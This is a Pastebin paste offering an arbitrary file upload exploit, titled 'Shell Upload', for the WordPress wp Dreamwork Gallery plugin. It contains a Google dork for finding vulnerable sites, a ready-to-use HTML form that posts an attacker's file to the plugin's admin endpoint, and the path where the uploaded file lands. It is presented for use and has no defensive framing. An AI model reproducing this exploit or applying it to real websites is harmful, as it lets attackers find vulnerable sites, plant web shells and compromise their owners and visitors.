3xploit3r

Wordpress wp Dreamwork Gallery Shell Upload

Aug 27th, 2016
399
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--
  2.  
  3.  
  4.     \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
  5.      \ \ / /| | '__| | | / __|\  /| | | |_  /
  6.       \ V / | | |  | |_| \__ \/  \| |_| |/ /
  7.        \_/  |_|_|   \__,_|___/_/\_\____//___|
  8.        
  9.                                               -->
  10. #########################################################
  11. # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
  12. # Contact: FB: Abdou MjCodez Tw: VirusXDz
  13. # Category: webapps
  14. # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
  15. ########################################################
  16.  
  17.  
  18.  
  19. # Proof of Concept
  20.  
  21. the uploaded file will be located in the directory
  22.  
  23. Example : [(7)_uploadfolder]
  24. /wp-content/uploads/dreamwork/7_uploadfolder/big/
  25.  
  26.  
  27. <html>
  28. <body>
  29. <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  30. <input type="hidden" name="task" value="drm_add_new_album" />
  31. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  32. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  33. <input type="file" name="album_img" value="" />
  34. <input type="submit" value="Submit" />
  35. </form>
  36. </body>
  37. </html>
  38.  
  39. Video :
  40. https://youtu.be/_7uAkAzlFrY
  41.  
  42. Bye
Add Comment
Please, Sign In to add comment